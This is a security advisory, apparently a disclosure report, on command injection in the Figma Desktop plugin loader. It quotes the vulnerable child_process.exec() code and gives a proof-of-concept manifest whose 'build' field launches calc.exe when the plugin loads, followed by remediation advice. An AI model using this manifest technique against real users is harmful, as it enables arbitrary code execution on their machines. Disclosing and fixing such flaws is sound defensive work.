
OS Command Injection Vulnerability via Plugin Execution in Figma Desktop Application
Figma Desktop Application(v125.6.5) contains a command injection vulnerability in plugin loader.
A malicious plugin manifest(manifest.json) can abuse the build field, which is passed directly into child_process.exec() without validation.
This allows arbitrary OS command execution as soon as the plugin is loaded, without security warnings or prompts.
The vulnerability stems from code located in main.js, which imports Node.js’s built-in child_process module:
Zlt = require("child_process")
Later, if the build field is present in a plugin’s manifest.json file and its value is a string, application executes the value directly using child_process.exec() without any sanitization or validation:
if (
s.build &&
typeof s.build === "string" &&
(l.path = process.env.PATH || "",
await new Promise((g) => {
(0, Zlt.exec)(s.build, { cwd: i }, (y, I, P) => {
l.stdout = I;
l.stderr = P;
y && (l.buildErrCode = y.code);
g();
});
}),
l.buildErrCode
)
return l;
As a result, the following manifest.json file contained in a malicious plugin would cause the value of the build field to be executed as an OS command:
{
"name": "<NAME>",
"id": "<ID>",
"api": "1.0.0",
"main": "code.js",
"build": "<COMMAND>",
"capabilities": [],
"enableProposedApi": false,
"documentAccess": "dynamic-page",
"editorType": [
"figma"
],
"networkAccess": {
"allowedDomains": [
"none"
]
}
}
This execution flow is embedded in Figma’s plugin handling logic, and the inclusion of the require("child_process") call in main.js confirms that command execution is built directly into the application’s core logic.
By running a plugin that includes the following malicious manifest.json:
{
"name": "poc",
"id": "1535549154235958412",
"api": "1.0.0",
"main": "code.js",
"build": "calc.exe",
"capabilities": [],
"enableProposedApi": false,
"documentAccess": "dynamic-page",
"editorType": [
"figma"
],
"networkAccess": {
"allowedDomains": [
"none"
]
}
}
Once this plugin is registered in Figma and executed, the specified OS command(calc.exe) runs immediately.
https://github.com/user-attachments/assets/48e0a47a-0d1c-4a92-b9ff-33e9559fd5e7
Although the execution of the build field is an officially supported feature in the Figma Desktop Application, the application should avoid relying on user-controlled fields in manifest.json, such as build, wherever possible.
If such fields must be supported, they must undergo strict input validation to prevent command injection.
Additionally, the use of Node.js child_process.exec() should be avoided, and safer alternatives with explicit argument handling should be adopted instead.